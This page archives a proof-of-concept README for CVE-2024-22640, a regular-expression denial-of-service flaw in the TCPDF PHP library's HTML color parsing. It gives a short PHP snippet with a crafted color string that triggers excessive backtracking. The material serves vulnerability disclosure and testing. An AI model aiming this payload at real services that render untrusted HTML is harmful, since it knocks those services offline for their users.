CVE-2024-22640 PoC — TCPDF 安全漏洞

Source

https://github.com/zunak/CVE-2024-22640

Associated Vulnerability

Title:TCPDF 安全漏洞 (CVE-2024-22640)
Description:TCPDF是Tecnick开源的一个库。用于生成 PDF 文档和条形码。 TCPDF 6.6.5及之前版本存在安全漏洞，该漏洞源于使用精心设计的 crafted color HTML 页面容易受到拒绝服务攻击。

Readme

# CVE-2024-22640

#### Vulnerability Type
Regular expression Denial of Service (ReDoS)

#### Affected Product and Version
TCPDF <= 6.7.4

#### Attack Vector
TCPDF parse HTML color contains crafted payload.

#### Description
TCPDF version <= 6.7.4 is vulnerable to ReDoS (Regular Expression Denial of Service) if parsing an untrusted HTML page with a crafted color.

#### PoC
```php
<?php

require_once('../tcpdf.php');

$test = new TCPDF_COLORS();
$ref = "none";
$test -> convertHTMLColorToDec('["t"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!]',$ref);
?>
```
> Note: Checking with **preg_last_error()** after the vulnerable line of code, the regEx will exit with **PREG_BACKTRACK_LIMIT_ERROR**.

File Snapshot


 [4.0K]  /data/pocs/f3e34b86bdef9522d2b953c974d57ce55f7b759c
└── [ 779]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!